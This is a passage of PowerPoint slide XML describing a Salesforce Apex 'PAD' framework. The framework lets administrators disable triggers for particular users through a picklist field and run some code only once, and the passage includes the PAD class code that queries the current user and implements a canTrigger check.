              <a:rPr lang="en-GB" sz="900" b="1" dirty="0" smtClean="0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en-GB" sz="9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 pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PAD.canTrigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="9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</a:rPr>
              <a:t>'your value from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>picklist</a:t>
            </a:r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GB" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PAD_BypassTrigger__c</a:t>
            </a:r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</a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)){</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="9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Where ‘your value…’ is the reference of the Apex Class in the user multi-select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
              <a:t>picklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_BypassTrigger__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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Create a PAD class with a custom code shown in the next slide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This will make only one query to the user value, as the result will be remembered through any cascade trigger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1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Very performing and light against governor limits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This solution is not dependant on any profile, and can make easy to activate/deactivate the trigger just when needed for a username.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> : PAD Class and Component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The deactivation system is part of the PAD framework that has to be customized according to your needs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>It contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Common code that is executed once during the full Apex context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Apex method to bypass or not part of the functional areas, or to run them only once</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Helper code providing utility function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>The controller of the PAD debugging component for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>VisualForce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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&lt;PAD Class : Code&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376837" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="685800"/>
            <a:ext cx="7315200" cy="617734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r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> class PAD{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>private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final Set&lt;String&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>requiredOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> Set&lt;String&gt;{'AP123','AP432'};//List of Apex codes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> once. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> code to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>list</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>private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Set&lt;String&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>hasRun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> Set&lt;String&gt;();//List of Apex code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>already</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>empty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>.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final String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_BypassTrigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;//List of triggers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>bypassed</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/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final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_DebugMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>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final String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>userRoleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;  //User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> Name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final String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>userProfileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>;//User Profile Name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Set&lt;String&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexForcedBypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> Set&lt;String&gt;();//ex: 'AP123','AP432'//List of Apex codes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>bypassed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>dynamically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>temporaryly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>managed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> by Apex Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>{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System.Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>('## &gt;&gt;&gt; PAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> :BEGIN &lt;&lt;&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> by ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>UserInfo.getName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>[SELECT UserRole.Name,Profile.Name,UserPreferencesApexPagesDeveloperMode,PAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>_BypassTrigger__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> FROM User WHERE Id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>UserInfo.getUserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>() LIMIT 1];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PAD_BypassTrigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>';'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>user.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_BypassTrigger__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>';';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PAD_DebugMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>user.UserPreferencesApexPagesDeveloperMode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userRoleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>user.UserRole.Name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userProfileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>user.Profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>.Name;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System.Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>('## &gt;&gt;&gt; PAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> : END &lt;&lt;&lt;');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dirty="0" err="1" smtClean="0"/>
              <a:t>boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>canTrigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>){//If no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/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requiredOnce.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>)){//If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> Once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hasRun.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> false;//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>Already</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>               hasRun.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dirty="0" err="1" smtClean="0"/>
              <a:t>ApexName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>);//Never </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>bypassed</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>       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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_BypassTrigger.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>(';'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>';')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>==-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" b="1" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
